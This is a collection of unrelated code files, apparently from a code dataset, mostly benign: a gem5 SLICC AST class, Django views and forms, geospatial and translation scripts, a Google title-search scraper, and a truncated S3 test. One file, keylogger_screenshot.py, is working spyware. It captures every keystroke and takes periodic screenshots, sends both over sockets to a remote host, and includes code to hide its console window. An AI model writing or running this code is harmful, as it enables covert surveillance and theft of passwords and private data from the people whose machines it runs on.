Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom slicc.ast.StatementAST import StatementAST\nfrom slicc.symbols import Var\n\n\nclass DeferEnqueueingStatementAST(StatementAST):\n def __init__(self, slicc, queue_name, type_ast, statements):\n super().__init__(slicc)\n\n self.queue_name = queue_name\n self.type_ast = type_ast\n self.statements = statements\n\n def __repr__(self):\n return \"[DeferEnqueueingStatementAst: %s %s %s]\" % (\n self.queue_name,\n self.type_ast.ident,\n self.statements,\n )\n\n def generate(self, code, return_type, **kwargs):\n code(\"{\")\n code.indent()\n self.symtab.pushFrame()\n\n msg_type = self.type_ast.type\n\n # Add new local var to symbol table\n v = Var(\n self.symtab,\n \"out_msg\",\n self.location,\n msg_type,\n \"*out_msg\",\n self.pairs,\n )\n self.symtab.newSymbol(v)\n\n # Declare message\n code(\n \"std::shared_ptr<${{msg_type.c_ident}}> out_msg = \"\n \"std::make_shared<${{msg_type.c_ident}}>(clockEdge());\"\n )\n\n # The other statements\n t = self.statements.generate(code, None)\n self.queue_name.assertType(\"OutPort\")\n\n code(\n \"(${{self.queue_name.var.code}}).deferEnqueueingMessage(addr, \"\n \"out_msg);\"\n )\n\n # End scope\n self.symtab.popFrame()\n code.dedent()\n code(\"}\")\n\n def findResources(self, resources):\n var = self.queue_name.var\n res_count = int(resources.get(var, 0))\n resources[var] = str(res_count + 1)\n","sub_path":"src/mem/slicc/ast/DeferEnqueueingStatementAST.py","file_name":"DeferEnqueueingStatementAST.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"649396605","text":"#!/usr/bin/env ipython\n\n\"\"\"Basic example\n\nSets up a transformer that computes a result based on two inputs\nThe input and the transformation code is edited live in a GUI\n\"\"\"\n\nfrom seamless import context, cell, pythoncell, transformer\nfrom seamless.lib import edit, display\n\nctx = context()\n\n# Create 3 int cells: a=2, b=3, and result\nctx.a = cell(\"int\").set(2)\nctx.b = cell(\"int\").set(3)\nctx.result = cell(\"int\")\n\n# Set up a transformer that computes \"result\" as a function of \"a\" and \"b\"\nt = ctx.transform = transformer({\n \"a\": {\"pin\": \"input\", \"dtype\": \"int\"},\n \"b\": {\"pin\": \"input\", \"dtype\": \"int\"},\n \"result\": {\"pin\": \"output\", \"dtype\": \"int\"}\n})\n\n# Connect the cells to the transformer pins\nctx.a.connect(t.a)\nctx.b.connect(t.b)\nt.result.connect(ctx.result)\n\n# Every transformer has an implicit extra input pin, called \"code\"\n# It must be connected to 
a Python cell\nctx.formula = pythoncell().set(\"return a + b\")\nctx.formula.connect(t.code)\n\n# Transformers execute asynchronously; ctx.equilibrate() will wait until all\n# transformations have finished\nctx.equilibrate()\n\n# The result cell will now have been computed\nprint(ctx.result.value) # 5\n\n# Updating either input automatically recomputes the result\nctx.a.set(10)\nctx.b.set(20)\nctx.equilibrate()\nprint(ctx.result.value) # 30\n\n# Updating the code also automatically recomputes the result\nctx.formula.set(\"\"\"\ndef fibonacci(n):\n def fib(n):\n if n <= 1:\n return [1]\n elif n == 2:\n return [1, 1]\n else:\n fib0 = fib(n-1)\n return fib0 + [ fib0[-1] + fib0[-2] ]\n fib0 = fib(n)\n return fib0[-1]\nreturn fibonacci(a) + fibonacci(b)\n\"\"\")\nctx.equilibrate()\nprint(ctx.result.value) # 6820\n\n# The inputs and the result and code can be edited/shown in a GUI\n# This automatically recomputes the result\nctx.gui = context() # Create a subcontext to organize our cells better\nctx.gui.a = edit(ctx.a, \"Input a\")\nctx.gui.b = edit(ctx.b, \"Input b\")\nctx.gui.result = display(ctx.result, \"Result\")\n\n# Same for the code, this creates a text editor\n# In this case, the code is updated as soon as you press Ctrl+S or click \"Save\"\nctx.gui.formula = edit(ctx.formula, \"Transformer code\")\n\n# The source code of each editor is itself a seamless cell that can be edited\n# Editing its source code immediately changes the other window!\ntext_editor_code = ctx.gui.formula.rc.code_start.cell()\nctx.gui.text_editor = edit(text_editor_code, \"Text editor source code\")\n\n# The entire context can be saved in a file\nctx.tofile(\"basic.seamless\")\n\n# The context can later be loaded with:\n# ctx = seamless.fromfile(\"basic.seamless\")\n","sub_path":"OLD/examples/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"264101281","text":"\"\"\"sogeun URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom sgapp import views\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', views.signin, name=\"signin\"),\n    path('home/', views.home, name=\"home\"),\n    path('new', views.new, name=\"new\"),\n    path('signup/', views.signup, name=\"signup\"),\n    path('signout/', views.signout, name=\"signout\"),\n    path('signin/', views.signin, name=\"signin\"),\n    path('mypage/', views.mypage, name=\"mypage\"),\n    path('change_pw/', views.change_pw, name=\"change_pw\"),\n    path('', views.detail, name=\"detail\"),\n    path('edit/', views.edit, name=\"edit\"),\n    path('delete/', views.delete, name=\"delete\"),\n    path('c_create/', views.c_create, name=\"c_create\"),\n    path('search/', views.search, name=\"search\"),\n    path('like/', views.like, name=\"like\"),\n    path('unlike/', views.unlike, name=\"unlike\"),\n]\nurlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"sogeun/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"103408022","text":"\"\"\" This function attributes a drainage network with drainage area values for each slope. \"\"\"\n\n#imports\nimport geopandas as gpd\nfrom rasterstats import zonal_stats\nimport os\n\n\ndef add_da(network, da, sref):\n    \"\"\"\n    This function attributes each reach of a drainage network with a value representing the\n    contributing upstream drainage area.\n    PARAMS\n    :network: string - path to a drainage network shapefile\n    :da: string - path to a drainage area raster\n    :sref: dict - spatial reference for files of form {'init':'epsg:'}\n    :return:\n    \"\"\"\n\n    # read in network and check for projection\n    flowlines = gpd.read_file(network)\n    if flowlines['geometry'].crs == sref:\n        pass\n    else:\n        flowlines = flowlines.to_crs(sref)\n\n    # list to store da values\n    da_list = []\n\n    # iterate through each network segment, obtain da value and add to list\n    for i in flowlines.index:\n        segment = flowlines.loc[i]\n\n        # buffer segment to account for positional inaccuracy between da raster and network\n        seg_geom = segment['geometry']\n        buf = seg_geom.buffer(30)  # 30 m buffer; can change this value\n\n        zs = zonal_stats(buf, da, stats=\"count min mean max median\")\n        da_value = zs[0].get('max')\n\n        da_list.append(da_value)\n\n    # add da values to network attribute table\n    flowlines['Drain_Area'] = da_list\n    flowlines.to_file(network)\n\n    return\n\n\n","sub_path":"useful_functions/da_network_attribute.py","file_name":"da_network_attribute.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"241556276","text":"from googletrans import Translator\nfrom datetime import date\nimport os\nimport sys\n\n# Declare the Google Translate object\nTrans = Translator()\n\nfilename = input('輸入紀錄名稱(若留白,預設以 \"年-月-日-流水號\" 命名):')\n\n# If the record already exists, open it for appending\nif(os.path.isfile('./record/'+filename)):\n    fout = open('./record/'+filename,'a')\n\n# If the record does not exist, create a new file\nelse:\n    if(filename == ''):\n        # Use today's date as the file name\n        today = date.today()\n        filename = today.isoformat()\n        # Handle the serial-number suffix\n        i = 1\n        check_file = './record/'+filename+'-'+str(i)\n        while(os.path.isfile(check_file)):\n            i+=1\n            check_file = './record/'+filename+'-'+str(i)\n        # Check for the record folder and create it if missing\n        try:\n            fout = open('./record/'+filename+'-'+str(i),'a')\n        except:\n            os.mkdir('./record')\n            fout = open('./record/'+filename+'-'+str(i),'a')\n    else:\n        # Check for the record folder and create it if missing\n        try:\n            fout = open('./record/'+filename,'a')\n        except:\n            os.mkdir('./record')\n            fout = open('./record/'+filename,'a')\n\nprint('----------------')\nwhile True:\n    try:\n        data = input()\n    except:\n        break\n    translated_data = Trans.translate(data,dest='zh-TW').text\n    print(translated_data)\n    print('----------------')\n    if(data != translated_data):\n        print(data, file = fout)\n        print(translated_data, file = fout)\n        print('----------------', file = fout)\nprint('recording as ' + './record/' + filename + ' ...')\nfout.close()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"618040784","text":"from flask import Blueprint, request, jsonify\nfrom flask_jwt_extended import (\n    get_jwt_identity,\n    jwt_required\n)\nimport requests\nimport os\n\ngooglemap_api_blueprint = Blueprint(\"googlemap_api\",\n                                    __name__,\n                                    template_folder=\"templates\")\n\n\n@googlemap_api_blueprint.route(\"/\",methods=[\"POST\"])\n@jwt_required\ndef serch():\n\n    place = request.json.get('place', None)\n    key=os.environ.get('GoogleAPI')\n\n    # has to be replaced with my key\n    r = requests.get(f'https://maps.googleapis.com/maps/api/geocode/json?address={place}&key={key}')\n    return r.text\n\n    ","sub_path":"instagram_api/blueprints/googlemap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"403817529","text":"# coding:utf-8\n\nimport os\n\nif __name__ == \"__main__\":\n    i = 0\n    while i < 106:\n        file_name = '000' + str(i).zfill(3) + '_0'\n        dir_name = '/data/11084769/url_data/url_2018_1205_billion/'\n        cmd1 = \"cat {0}|cut -f 1 >>{1}{0}\".format(file_name, dir_name)\n        os.system(cmd1)\n        i += 1\n","sub_path":"course_test/32_cut_file.py","file_name":"32_cut_file.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"285215381","text":"#!/usr/bin/env python3\n#-*- coding: utf-8 -*-\n\n# ********************************************************\n# Script validates if paper title was published or not.\n#\n# Handles reading input file and checking against\n# Google to determine if previously published or not.\n# If able to process successfully will print results\n# to standard out.\n#\n# python3 pp.py [<input-file>|<title>]\n#\n# input-file: XLS or CSV of papers' corresponding titles to search\n# title: individual paper title (string) to search on\n#\n# Example: python3 pp.py \"Curing Cancer with Bleach\"\n#\n# If successful exit code is 0\n# If fails exit code is > 0\n# ********************************************************\n\nimport requests\nimport io, os, sys, csv, time, calendar\nimport puremagic\nimport urllib.parse\nimport xlrd, mmap\nimport xlsxwriter as xs\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\n\ndef err(s=None):\n    \"\"\"\n    Converts string to bytes & outputs to stderr\n    \"\"\"\n    if not s:\n        return\n    s = s + \"\\n\"\n    os.write(2, s.encode())\n\ndef is_valid_file(fname=None):\n    if not fname:\n        return False\n    fname = fname.strip()\n    return os.path.isfile(fname)\n\ndef search(paper_title=None):\n    global SEARCH_URL\n    global USER_AGENT\n    results = []\n\n    if not paper_title:\n        return results\n\n    # encode query string param before search
    params = {'q': paper_title}\n    query = urllib.parse.urlencode(params, quote_via=urllib.parse.quote)\n    url = SEARCH_URL + query\n    #print(url)\n\n    # desktop user-agent; expected by google in HTTP header\n    headers = {\"user-agent\" : USER_AGENT}\n    resp = requests.get(url, headers=headers)\n\n    # check if valid response\n    if resp.status_code != 200:\n        err(\"Failed - unsuccessful response from Google status code: \" + str(resp.status_code))\n        return results\n\n    # parse HTTP response and pull out search results\n    soup = BeautifulSoup(resp.content, \"html.parser\")\n\n    for g in soup.find_all('div', class_='g'):\n        anchors = g.find_all('a')\n        spans = g.find_all('span', class_='st')\n        if anchors and spans:\n            link = anchors[0]['href']\n            title = g.find('h3').text\n            description = spans[0].text\n            #print(\"Link \", link)\n            #print(\"Title\", title)\n            #print(\"Description\", description)\n            item = {\n                \"title\": title,\n                \"link\": link,\n                \"description\": description\n            }\n            results.append(item)\n    return results\n\ndef is_filetype(filename=None, search_str=None):\n    \"\"\"\n    Applies magic byte (header) inspection to determine if of search file type.\n    \"\"\"\n    if not search_str:\n        return False\n    results = puremagic.magic_file(filename)\n    for result in results:\n        if search_str.lower() in result.name.lower():\n            return True\n    return False\n\ndef extract_xlsx(fname=None, search_hdrs=None):\n    \"\"\"\n    Reads file contents and returns a list of pairs including\n    each manuscript id and corresponding manuscript title.\n    \"\"\"\n    results = []\n\n    if fname is None or search_hdrs is None:\n        err(\"Invalid XLSX extraction for filename and column headers: \" + fname + \" \".join(search_hdrs))\n        return results\n\n    # extract corresponding data rows to columns for specific headers\n    wb = xlrd.open_workbook(fname)\n    ws = wb.sheet_by_index(0)\n\n    # find the indexes where the headers occur\n    headers = []\n    for i in range(len(ws.row(0))):\n        if ws.row(0)[i].value in search_hdrs:\n            item = {\n                \"header\": ws.row(0)[i].value,\n                \"index\": i\n            }\n            headers.append(item)\n\n    # extract data after first row\n    results = []\n    for i in range(1, ws.nrows):\n        result = {}\n        for hdr in headers:\n            #print(hdr.get(\"header\"))\n            #print(ws.row(i)[hdr.get(\"index\")].value)\n            item = {\n                hdr.get(\"header\"): ws.row(i)[hdr.get(\"index\")].value\n            }\n            result.update(item)\n        results.append(result)\n\n    #print(results)\n    return results\n\ndef extract_csv(fname=None, search_hdrs=None):\n    '''\n    Reads a CSV file and extracts all rows for column header names requested.\n    Returns a list of dictionaries with column names and corresponding row values.\n    '''\n    results = []\n\n    if fname is None or search_hdrs is None:\n        err(\"Invalid CSV extraction for filename and column headers: \" + fname + \" \".join(search_hdrs))\n        return results\n\n    result = {}\n    # extract corresponding data rows to columns for specific headers\n    with open(fname, \"r\", encoding=\"utf-8-sig\") as f:\n        reader = csv.DictReader(f)\n        for line in reader:\n            result = dict((k, line[k]) for k in search_hdrs if k in line)\n            #print(result)\n            results.append(result)\n\n    return results\n\n# ----------------------------------------------------------------------\n# M A I N   L O G I C\n# ----------------------------------------------------------------------\n\ndef main():\n    global SEARCH_URL\n    global USER_AGENT\n    global FILE_SEARCH_HDRS\n    global TITLE\n\n    if len(sys.argv) < 2:\n        err(\"Invalid input arguments: \" + sys.argv[0] + \" [<input-file>|<title>]\")\n        sys.exit(1)\n\n    search_records = []\n    input = sys.argv[1]\n\n    if is_valid_file(input):\n        if input.endswith('.csv'):\n            data = extract_csv(input, FILE_SEARCH_HDRS)\n        elif input.endswith('.xlsx'):\n            data = extract_xlsx(input, FILE_SEARCH_HDRS)\n        else:\n            err(\"Unsupported file type - cannot convert: \" + input)\n            sys.exit(2)\n        search_records = data\n    else:\n        # input is not an existing file - treat cmd line arg as a title to search directly via Google\n        item = {\n            ID: \"NA\",\n            AUTHORS: \"NA\",\n            TYPE: \"NA\",\n            TITLE: input\n        }\n        search_records.append(item)\n\n    # search on title - only initial top 10 results from Google\n    hdr_shown = False\n    results = []\n\n    # output results to XLSX file named current timestamp\n    ts = calendar.timegm(time.gmtime())\n    wb = xs.Workbook(\"paper-published-\" + str(ts) +\".xlsx\")\n    ws = wb.add_worksheet()\n    # Add a bold format to use to highlight cells.\n    bold = wb.add_format({'bold': True})\n    row = 0\n\n    for rec in search_records:\n        #print(\"Searching: \" + rec[ID] + \"-\" + rec[TITLE])\n        results = search(rec[TITLE])\n        time.sleep(THROTTLE_SECS)  # avoid being blocked by google - rate limit calls\n\n        # check direct or partial ratio match on title\n        for result in results[0:1]:\n            if rec[TITLE] not in result[\"title\"]:\n                continue\n\n            direct = fuzz.ratio(rec[TITLE], result[\"title\"])\n            partial = fuzz.partial_ratio(rec[TITLE], result[\"title\"])\n\n            # output results\n            if not hdr_shown:\n                print(\"Paper ID,\", \"Paper Title,\", \"Search Title,\", \"Author, \", \"MS Type, \", \"Direct Match,\", \"Partial Match,\", \"Link, \", \"Description\")\n                ws.write(row, 0, \"Paper ID\", bold)\n                ws.write(row, 1, \"Paper Title\", bold)\n                ws.write(row, 2, \"Search Title\", bold)\n                ws.write(row, 3, \"Authors\", bold)\n                ws.write(row, 4, \"MS Type\", bold)\n                ws.write(row, 5, \"Direct Match\", bold)\n                ws.write(row, 6, \"Partial Match\", bold)\n                ws.write(row, 7, \"Link\", bold)\n                ws.write(row, 8, \"Description\", bold)\n                hdr_shown = True\n\n            # ignore search results with poor matches\n            if partial < 60:\n                continue\n\n            print(\"%s,\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",%.2f,%.2f,%s,%s\" % (rec[ID], rec[TITLE], result[\"title\"], rec[AUTHORS], rec[TYPE], direct, partial, result[\"link\"], result[\"description\"]))\n\n            row += 1\n            ws.write(row, 0, rec[ID])\n            ws.write(row, 1, rec[TITLE])\n            ws.write(row, 2, result[\"title\"])\n            ws.write(row, 3, rec[AUTHORS])\n            ws.write(row, 4, rec[TYPE])\n            ws.write(row, 5, direct)\n            ws.write(row, 6, partial)\n            ws.write_url(row, 7, result[\"link\"], string=result[\"link\"])\n            ws.write(row, 8, result[\"description\"])\n\n    wb.close()\n\n    sys.exit(0)\n\n# ==========================\n# Global Variables\n# ==========================\nSEARCH_URL = \"https://google.com/search?\"\nUSER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0\"\nID = \"Manuscript ID\"\nTITLE = \"Manuscript Title\"\nAUTHORS = \"Author Names\"\nTYPE = \"Manuscript Type\"\nFILE_SEARCH_HDRS = [\n    ID,\n    TITLE,\n    AUTHORS,\n    TYPE\n]\nTHROTTLE_SECS = 1\n\nif __name__ == \"__main__\":\n    main()\n    sys.exit(0)\n","sub_path":"pp.py","file_name":"pp.py","file_ext":"py","file_size_in_byte":8788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"599747213","text":"from django import forms\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.utils.translation import ugettext, ugettext_lazy as _\r\nfrom django.core.cache import cache\r\nfrom allauth.account.forms import LoginForm\r\n# from simplecaptcha import captcha, captchaform\r\nfrom captcha.fields import
CaptchaField\r\nimport logging\r\nfrom .utils import (is_phone_number_valid, generate_new_phone_verification_code)\r\nfrom .models import UserInfo, Demand, econNews\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n\r\nclass MyLoginForm(LoginForm):\r\n # captcha = CaptchaField()\r\n def __init__(self, *args, **kwargs):\r\n super(MyLoginForm, self).__init__(*args, **kwargs)\r\n self.fields[\"captcha\"] = CaptchaField()\r\n\r\nclass MySignupForm(forms.Form):\r\n phonenumber = forms.CharField(label=_(\"Moible Number\"), max_length = 11)\r\n yanzhengma = forms.CharField(label=_(\"Mobile Verification Code\"), max_length=4)\r\n # captcha = CaptchaField(label=\"图形验证码\")\r\n\r\n\r\n def clean_phonenumber(self):\r\n phonenumber = self.cleaned_data['phonenumber']\r\n if not is_phone_number_valid(phonenumber):\r\n raise forms.ValidationError(_(\"Mobile Number Incorrect\"))\r\n return phonenumber\r\n\r\n def clean_yanzhengma(self):\r\n yanzhengma = self.cleaned_data['yanzhengma']\r\n if len(yanzhengma) != 4 or (not yanzhengma.isdigit()):\r\n raise forms.ValidationError(_(\"Error in mobile verification code format\"))\r\n return yanzhengma\r\n\r\n def clean(self):\r\n super(MySignupForm, self).clean()\r\n key = 'phone_reg_code'+str(self.cleaned_data.get('phonenumber'))\r\n code = cache.get(key)\r\n # logger.warning('key:'+key)\r\n # logger.warning('cleaned_data:'+str(self.cleaned_data))\r\n # logger.warning('code from cache:'+code)\r\n if code is None:\r\n raise forms.ValidationError(_(\"Verification code is None\"))\r\n if code != self.cleaned_data.get('yanzhengma'):\r\n raise forms.ValidationError(_(\"Mobile verification failed.\"))\r\n\r\n def signup(self, request, user):\r\n \"\"\" Required, or else it throws deprecation warnings \"\"\"\r\n user.profile = UserInfo.objects.create(user = user)\r\n user.profile.phonenumber = self.cleaned_data['phonenumber']\r\n user.profile.phone_is_verified = True\r\n user.profile.save()\r\n\r\n\r\nclass AjaxForm(forms.Form):\r\n captcha = CaptchaField()\r\n # def save(self):\r\n # pass\r\n","sub_path":"lstngsvc/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"504027900","text":"import pyHook\n#pyxhook = '/home/yash/***/pyxhook/pyxhook/pyxhook.py'\nimport pythoncom\nimport sys\nimport logging\nfrom threading import Thread\nimport socket\nimport os\n#sys.path.append(os.path.dirname(os.path.expanduser(pyxhook)))\n#import pyxhook\nimport pyautogui\nimport time\nimport win32gui, win32con\n\ndef keyboard():\n\tfile = 'output.txt'\n\tf = open(file, \"w+\")\n\n\tdef OnKeyboardEvent(event):\n\t logging.basicConfig(filename=file, level=logging.DEBUG, format='%(message)s')\n\t logging.log(10,chr(event.Ascii))\n\t return True\n\thooks_manager = pyHook.HookManager()\n #hooks_manager = pyxhook.HookManager()\n\thooks_manager.KeyDown = OnKeyboardEvent\n\thooks_manager.HookKeyboard()\n\tpythoncom.PumpMessages()\n\ndef sendKeyLog():\n\twhile True:\n\t\tclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tclient_socket.connect((\"xxx.xxx.xx.xx\", xxxx))\n\n\t\tclient_socket.send(\"txt\".encode())\n\n\t\ttxt = open('output.txt', 'rb')\n\t\twhile True:\n\t\t\tdata = txt.readline(4)\n\t\t\tif not data: \n\t\t\t\tbreak\n\t\t\tclient_socket.send(data)\n\t\t# print(\"log sent\")\n\t\ttxt.close()\n\t\tclient_socket.close()\n\t\ttime.sleep(10)\n\ndef screenshot():\n\ti = 1\n\twhile True:\n\t\tclient_socket = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM)\n\t\tclient_socket.connect((\"xxx.xxx.xx.xx\", xxxxx))\n\n\t\tclient_socket.send(\"png\".encode())\n\t\t\n\t\tscreenshot = pyautogui.screenshot()\n\t\tscreenshot.save('screenshot.png')\n\t\timage = open('screenshot.png', 'rb')\n\n\t\twhile True:\n\t\t data = image.readline(4096)\n\t\t if not data:\n\t\t \tbreak\n\t\t client_socket.send(data)\n\t\timage.close()\n\t\tclient_socket.close()\n\n\t\tos.remove('screenshot.png')\n\t\ttime.sleep(10)\n\t\ti+=1\n\texit()\n\nif __name__ == \"__main__\":\n # Hiding CMD\n\t# hide = win32gui.GetForegroundWindow()\n\t# win32gui.ShowWindow(hide , win32con.SW_HIDE)\n\n\tthread = Thread(target = keyboard)\n\tthread2 = Thread(target = screenshot)\n\tthread3 = Thread(target = sendKeyLog)\n\tthread.start()\n\tthread2.start()\n\tthread3.start()\n","sub_path":"Screenshot-Keylog/keylogger_screenshot.py","file_name":"keylogger_screenshot.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"33773222","text":"from copy import deepcopy\nimport random\nfrom commons import TAG2LABEL, LABEL2TAG, WORD2ID, ID2WORD\n\n\nclass DataManager(object):\n def __init__(self, data_file_path, word2id=WORD2ID, tag2label=TAG2LABEL):\n self.data_file_path = data_file_path\n self.word2id = word2id\n self.tag2label = tag2label\n self.length = None\n self.origin_data = self.build_data()\n self.pp_data = self.preprocess_data()\n\n def build_data(self):\n \"\"\"\n Build word and tag.\n :return:\n \"\"\"\n data = []\n sentence_words, sentence_tags = [], []\n with open(self.data_file_path) as r_file:\n for line in r_file:\n if line == '\\n':\n data.append((sentence_words, sentence_tags))\n sentence_words, sentence_tags = [], []\n else:\n word, tag = line.strip().split()\n sentence_words.append(word)\n sentence_tags.append(tag)\n if len(sentence_words):\n data.append((sentence_words, sentence_tags))\n return data\n\n def preprocess_data(self):\n \"\"\"\n Transfer word+tag to id+label.\n :return:\n \"\"\"\n data = []\n for (sentence_words, sentence_tags) in self.origin_data:\n sentence_ids = []\n sentence_labels = []\n for word in sentence_words:\n sentence_ids.append(self.word2id[word])\n for tag in sentence_tags:\n sentence_labels.append(self.tag2label[tag])\n data.append((sentence_ids, sentence_labels))\n return data\n\n def __iter__(self):\n batch_size = 20\n shuffle = True\n if shuffle:\n data = deepcopy(self.pp_data)\n random.shuffle(data)\n else:\n data = self.pp_data\n\n ids, labels = [], []\n for (sentence_ids, sentence_labels) in data:\n ids.append(sentence_ids)\n labels.append(sentence_labels)\n if len(ids) == batch_size:\n yield ids, labels\n ids, labels = [], []\n\n if len(ids):\n yield ids, labels\n\n def __len__(self):\n if self.length is None:\n self.length = 0\n for _ in self.origin_data:\n self.length += 1\n return self.length\n","sub_path":"slotsfilling/src/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"645988304","text":"import sys, os\nimport cherrypy\n\nfrom useless.base import daemon\n\n\ndef start_server(rootpage, configfile, appname, mainpath=None, pathname=None):\n if mainpath is None:\n mainpath = os.path.join('/usr/share', appname)\n if pathname is None:\n pathname = '%s_PATH' % appname.upper()\n if pathname in os.environ:\n top = os.environ[pathname]\n modpath = os.path.join(top, 'src')\n logfile = 
os.path.join(top, '%s.log' % appname)\n pidfile = os.path.join(top, '%s.pid' % appname)\n else:\n modpath = mainpath\n logfile = '/var/log/%s.log' % appname\n pidfile = '/var/run/%s.pid' % appname\n sys.path.append(modpath)\n varname = '%s_NODAEMON' % appname.upper()\n if varname not in os.environ:\n daemon.daemonize(stdout=logfile, pidfile=pidfile)\n cherrypy.root = rootpage()\n cherrypy.config.update(file=configfile)\n cherrypy.server.start()\n \n","sub_path":"branch/sqlgen2/useless/webframe/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"363753185","text":"import os\r\nimport re\r\nfrom time import sleep\r\n\r\nfrom pandas import DataFrame, read_csv\r\nimport pytest\r\nfrom hypothesis import given\r\nfrom hypothesis.strategies import integers, text, lists\r\n\r\nfrom ..grizly.drivers.frames_factory import QFrame\r\nfrom ..grizly.sources.filesystem.old_s3 import S3\r\nfrom ..grizly.sources.sources_factory import Source\r\nfrom ..grizly.utils.functions import get_path\r\nfrom ..grizly.config import config\r\n\r\n\r\ndef test_df_to_s3_and_s3_to_file():\r\n s3 = S3(file_name=\"testing_s3_class.csv\", s3_key=\"bulk/\")\r\n df = DataFrame({\"col1\": [1, 2], \"col2\": [3, 4]})\r\n s3.from_df(df, sep=\"\\t\")\r\n\r\n file_path = os.path.join(s3.file_dir, s3.file_name)\r\n\r\n s3.to_file()\r\n\r\n assert df.equals(read_csv(file_path, sep=\"\\t\"))\r\n os.remove(file_path)\r\n\r\n\r\ndef test_can_upload():\r\n s3 = S3(file_name=\"test_s3_2.csv\", s3_key=\"bulk/tests/\", min_time_window=2)\r\n df = DataFrame({\"col1\": [1, 2], \"col2\": [3, 4]})\r\n s3.from_df(df)\r\n\r\n assert not s3._can_upload()\r\n sleep(2)\r\n assert s3._can_upload()\r\n\r\n\r\ndef test_to_rds():\r\n import os\r\n\r\n # print(os.environ)\r\n\r\n dsn = get_path(\"grizly_dev\", \"tests\", \"Chinook.sqlite\")\r\n qf = QFrame(dsn=dsn, db=\"sqlite\", dialect=\"mysql\").from_table(table=\"Track\")\r\n\r\n qf.window(offset=100, limit=30, order_by=[\"TrackId\"])\r\n\r\n qf.assign(LikeIt=\"CASE WHEN GenreId = 5 THEN 1 ELSE 0 END\", dtype=\"INT\")\r\n qf.assign(SpareColumn=\"NULL\")\r\n\r\n qf.rename(\r\n {\r\n field: \"_\".join(re.findall(\"[A-Z][^A-Z]*\", alias)).lower()\r\n for field, alias in zip(qf.get_fields(aliased=False), qf.get_fields(aliased=True))\r\n }\r\n )\r\n\r\n s3_key = \"test/\"\r\n bucket = \"acoe-s3\"\r\n table_parquet = \"grizly_test_parquet\"\r\n table_csv = \"grizly_test_csv\"\r\n schema = \"sandbox\"\r\n path_csv = get_path(\"grizly_test.csv\")\r\n path_parquet = get_path(\"grizly_test.parquet\")\r\n\r\n s3_parquet = S3(\r\n file_name=os.path.basename(path_parquet),\r\n 